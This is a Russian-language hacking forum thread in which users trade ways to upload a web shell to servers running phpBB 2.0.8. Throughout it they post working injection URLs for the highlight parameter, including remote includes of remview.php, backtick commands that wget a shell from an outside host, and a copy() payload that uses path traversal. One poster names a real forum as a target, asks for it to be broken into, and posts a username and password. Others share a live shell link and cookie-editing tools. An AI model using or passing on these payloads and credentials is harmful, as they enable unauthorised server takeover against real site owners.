Вопрос про заливку шелла в Powered by phpBB 2.0.8 © 2001 phpBB Group

Люди, подскажите плизз.... буду очень признателен:

вот когда я хочу скатать шелл на сервер, используя:


http://имя хоста/modules.php?name=Forums/viewtopic.php?t=44=http://123.123.123.123/remview.php%00&t=1&highlight=%2527.include($_GET[44]).%2527


мне в ответ пишет:

he html tags you attempted to use are not allowed

[ Go Back ]

Как можно обойти эту защиту??? форум Powered by phpBB 2.0.8 © 2001 phpBB Group

 

можно закачать shell этой командой:
viewtopic.php?p=1&highlight=%2527.$poster=%60$ls%60.%2527&ls=wget%20http://badsite/shell.php

или:
viewtopic.php?p=3906&highlight=%2527.$poster=`wget%09http://badsite/shell.php`.%2527

может такая заморочка быть, типа привилегий нет чтобы файл создавать, ну тогда ищи папки доступные для записи =)

 

Onyx3, а почему ...t=44=... это бред! в твоём случае надо писать без t= !

 

а у меня вообще пишет что такой темы нет

 

Люди, ведь форум находится в : http://имяхоста/modules.php?name=Forums

И не одна из этих комманд чтобы залить шелл не действует!!!
Пишет либо - модуль не активен, либо ошибку Денвера!!!


Как можно обойти эту защиту??? форум Powered by phpBB 2.0.8 © 2001 phpBB Group

 

поробуй выполнить команды так:

 

а возможно ли записать открытую на запись, которая находиться на сервере не в папке "форум"

и еще,

ну узнал, я какая папка доступна на запись (даже в папке форум), что в запрос надо написать ?

viewtopic.php?a=http://123.123.123.123/remview.php&b=../../db/rem.php&t=4&highlight=%2527%252ecopy($_GET[a],$_GET)%252e%2527 ???????

типо этого? b=../../db/
а что вместо точек писать? полный путь? где находиться папка?
в таком случае как именно?
что брать за корневой католог?
forum/db/
или полный путь
/usr/home/public_html/forum


не понятно всё это...

P.S.
ведь drwxrwxrwx - это открытая папка на запись.

 

да не геморься ты, лучше залей обычным wget'ом и потом скопируй...

 

мне в ответ пишет:

The html tags you attempted to use are not allowed

[ Go Back ]

Как можно обойти эту защиту??? форум Powered by phpBB 2.0.8 © 2001 phpBB Group

 

Эй ну что кто нибудь встречал такую проблему??

 

Эй народ по активнее, по активне

 

вот форум версии 2.0.8
http://lipetsk.ru/town/forum2/
сам я профан во всем этом
но был рад если его ломанули

 

pass: pinochet
user: www2

 

ответ на мой пост?

 

эээ может кому полезно будет =)
http://forum.serverroom.us/remview.php

 

Какие вы можете предложить варианты взлома форму 2.08 , Union не проходит, может ещё какие нибудь есть??? И ещё как можно посматреть папки которые открыты для записи???(прошу написать комманду)

 

Народ киньте ссылку где можно скачать remview.php

 

Free download from http://php.spb.ru/remview/

 

Плиззз... напишите какими прогами можно подменять Cookie??? если не сложно то напишите ссылочку...

 

CookieEditor
http://antichat.ru/txt/old/progs.shtml